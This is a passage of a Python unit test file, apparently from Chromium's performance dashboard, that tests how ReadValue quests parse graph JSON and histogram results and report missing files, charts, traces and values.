arguments = dict(_BASE_ARGUMENTS_GRAPH_JSON)
del arguments['chart']
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='base_perftests/perf_results.json',
chart=None,
trace_or_story='trace_name')
self.assertEqual(quest, expected)
def testGraphJsonMissingTrace(self):
arguments = dict(_BASE_ARGUMENTS_GRAPH_JSON)
del arguments['trace']
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='base_perftests/perf_results.json',
chart='chart_name',
metric='chart_name',
trace_or_story=None)
self.assertEqual(quest, expected)
class _ReadValueExecutionTest(unittest.TestCase):
def setUp(self):
# Intercept the logging messages, so that we can see them when we have test
# output in failures.
self.logger = logging.getLogger()
self.logger.level = logging.DEBUG
self.stream_handler = logging.StreamHandler(sys.stdout)
self.logger.addHandler(self.stream_handler)
self.addCleanup(self.logger.removeHandler, self.stream_handler)
patcher = mock.patch('dashboard.services.isolate.Retrieve')
self._retrieve = patcher.start()
self.addCleanup(patcher.stop)
super(_ReadValueExecutionTest, self).setUp()
def SetOutputFileContents(self, contents):
self._retrieve.side_effect = (
'{"files": {"chartjson-output.json": {"h": "output json hash"}}}',
json.dumps(contents),
)
def SetOutputFileContentsProto(self, contents):
self._retrieve.side_effect = (
'{"files": {"chartjson-output.json": {"h": "output json hash"}}}',
contents,
)
def SetOutputFileContentsRaw(self, contents):
self._retrieve.side_effect = (contents,)
def assertReadValueError(self, execution, exception):
self.assertTrue(execution.completed)
self.assertTrue(execution.failed)
self.assertIsInstance(execution.exception['traceback'], basestring)
self.assertIn(exception, execution.exception['traceback'])
def assertReadValueSuccess(self, execution):
self.assertTrue(execution.completed)
self.assertFalse(execution.failed, 'Exception: %s' % (execution.exception,))
self.assertEqual(execution.result_arguments, {})
def assertRetrievedOutputJson(self):
expected_calls = [
mock.call('server', 'output hash'),
mock.call('server', 'output json hash'),
]
self.assertEqual(self._retrieve.mock_calls, expected_calls)
class ReadGraphJsonValueTest(_ReadValueExecutionTest):
def testReadGraphJsonValue(self):
self.SetOutputFileContents(
{'chart': {
'traces': {
'trace': ['126444.869721', '0.0']
}
}})
quest = read_value.ReadGraphJsonValue('chartjson-output.json', 'chart',
'trace')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (126444.869721,))
self.assertRetrievedOutputJson()
def testReadGraphJsonValue_PerformanceBrowserTests(self):
contents = {'chart': {'traces': {'trace': ['126444.869721', '0.0']}}}
self._retrieve.side_effect = (
'{"files": {"browser_tests/perf_results.json": {"h": "foo"}}}',
json.dumps(contents),
)
quest = read_value.ReadGraphJsonValue(
'performance_browser_tests/perf_results.json', 'chart', 'trace')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (126444.869721,))
expected_calls = [
mock.call('server', 'output hash'),
mock.call('server', 'foo'),
]
self.assertEqual(self._retrieve.mock_calls, expected_calls)
def testReadGraphJsonValueWithMissingFile(self):
self._retrieve.return_value = '{"files": {}}'
quest = read_value.ReadGraphJsonValue('base_perftests/perf_results.json',
'metric', 'test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNoFile')
def testReadGraphJsonValueWithMissingChart(self):
self.SetOutputFileContents({})
quest = read_value.ReadGraphJsonValue('chartjson-output.json', 'metric',
'test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueChartNotFound')
def testReadGraphJsonValueWithMissingTrace(self):
self.SetOutputFileContents({'chart': {'traces': {}}})
quest = read_value.ReadGraphJsonValue('chartjson-output.json', 'chart',
'test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueTraceNotFound')
class ReadValueTest(_ReadValueExecutionTest):
def testReadGraphJsonValue(self):
self.SetOutputFileContents(
{'chart': {
'traces': {
'trace': ['126444.869721', '0.0']
}
}})
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
chart='chart',
trace_or_story='trace')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (126444.869721,))
self.assertRetrievedOutputJson()
def testReadGraphJsonValueWithMissingFile(self):
self.SetOutputFileContentsRaw('{"files": {}}')
quest = read_value.ReadValue(
results_filename='base_perftests/perf_results.json',
chart='metric',
trace_or_story='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNoFile')
def testReadGraphJsonValueWithMissingTrace(self):
self.SetOutputFileContents({'chart': {'traces': {}}})
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
chart='chart',
trace_or_story='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueTraceNotFound')
def testReadHistogramsJsonValue(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueWithMissingFile(self):
self.SetOutputFileContentsRaw('{"files": {}}')
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='metric',
grouping_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
def testReadHistogramsJsonValueStoryNeedsEscape(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['http://story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='http://story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueHistogramNameNeedsEscape(self):
hist = histogram_module.Histogram('hist:name:has:colons', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['story:has:colons:too']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story:has:colons:too')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueGroupingLabelOptional(self):
hist = histogram_module.Histogram('hist:name:has:colons', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['story:has:colons:too']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
trace_or_story='story:has:colons:too')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueStatistic(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story',
statistic='avg')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (1,))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueStatisticNoSamples(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story',
statistic='avg')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNoValues')
def testReadHistogramsJsonValueMultipleHistograms(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist2 = histogram_module.Histogram('hist', 'count')
hist2.AddSample(0)
hist2.AddSample(1)
hist2.AddSample(2)
hist3 = histogram_module.Histogram('some_other_histogram', 'count')
hist3.AddSample(3)
hist3.AddSample(4)
hist3.AddSample(5)
histograms = histogram_set.HistogramSet([hist, hist2, hist3])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2, 0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsTraceUrls(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url1', 'trace_url2']))
hist2 = histogram_module.Histogram('hist2', 'count')
hist2.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url3']))
hist3 = histogram_module.Histogram('hist3', 'count')
hist3.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url2']))
histograms = histogram_set.HistogramSet([hist, hist2, hist3])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric=hist.name)
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0,))
self.assertEqual(
{
'completed':
True,
'exception':
None,
'details': [
{
'key': 'trace',
'value': 'story',
'url': 'trace_url1',
},
{
'key': 'trace',
'value': 'story',
'url': 'trace_url2',
},
{
'key': 'trace',
'value': 'story',
'url': 'trace_url3',
},
],
}, execution.AsDict())
self.assertRetrievedOutputJson()
def testReadHistogramsDiagnosticRefSkipTraceUrls(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url1', 'trace_url2']))
hist2 = histogram_module.Histogram('hist2', 'count')
hist2.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url3']))
hist2.diagnostics[reserved_infos.TRACE_URLS.name].guid = 'foo'
histograms = histogram_set.HistogramSet([hist, hist2])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric=hist.name)
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0,))
self.assertEqual(
{
'completed':
True,
'exception':
None,
'details': [
{
'key': 'trace',
'value': 'trace_url1',
'url': 'trace_url1',
},
{
'key': 'trace',
'value': 'trace_url2',
'url': 'trace_url2',
},
],
}, execution.AsDict())
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueWithNoGroupingLabel(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueWithNoStory(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
trace_or_story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueSummaryGroupingLabel(self):
samples = []
hists = []
for i in range(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['story%d' % i]))
hists.append(hist)
samples.extend(hist.sample_values)
histograms = histogram_set.HistogramSet(hists)
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hists[0].name,
grouping_label='label')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (sum(samples),))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueSummary(self):
samples = []
hists = []
for i in range(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['story%d' % i]))
hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
generic_set.GenericSet(['group:label1']))
hists.append(hist)
samples.extend(hist.sample_values)
for i in range(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['another_story%d' % i]))
hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
generic_set.GenericSet(['group:label2']))
hists.append(hist)
samples.extend(hist.sample_values)
histograms = histogram_set.HistogramSet(hists)
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric=hists[0].name)
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (sum(samples),))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueSummaryNoHistName(self):
samples = []
hists = []
for i in range(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['story%d' % i]))
hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
generic_set.GenericSet(['group:label1']))
hists.append(hist)
samples.extend(hist.sample_values)
histograms = histogram_set.HistogramSet(hists)
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(results_filename='chartjson-output.json')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, ())
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueEmptyHistogramSet(self):
self.SetOutputFileContents([])
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='metric',
grouping_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsJsonValueWithMissingHistogram(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric='does_not_exist')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsJsonValueWithNoValues(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric='chart')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsJsonValueGroupingLabelWithNoValues(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='chart',
grouping_label='label')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsJsonValueStoryWithNoValues(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='chart',
trace_or_story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsProtoValue(self):
hist_set = histogram_proto.Pb2().HistogramSet()
hist = hist_set.histograms.add()
hist.name = 'hist'
hist.unit.unit = histogram_proto.Pb2().COUNT
hist.all_bins[0].bin_count = 1
map1 = hist.all_bins[0].diagnostic_maps.add().diagnostic_map
map1['test'].generic_set.values.append('metric')
self.SetOutputFileContentsProto(hist_set.SerializeToString())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='metric',
grouping_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
def testReadHistogramsProtoValueEmptyHistogramSet(self):
hist_set = histogram_proto.Pb2().HistogramSet()
self.SetOutputFileContentsProto(hist_set.SerializeToString())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='metric',
grouping_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testMetricPropertyReturnsChart(self):
quest = read_value.ReadValue(
results_filename='somefile.json',
chart='somechart',
trace_or_story='trace')
self.assertEqual(quest.metric, 'somechart')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.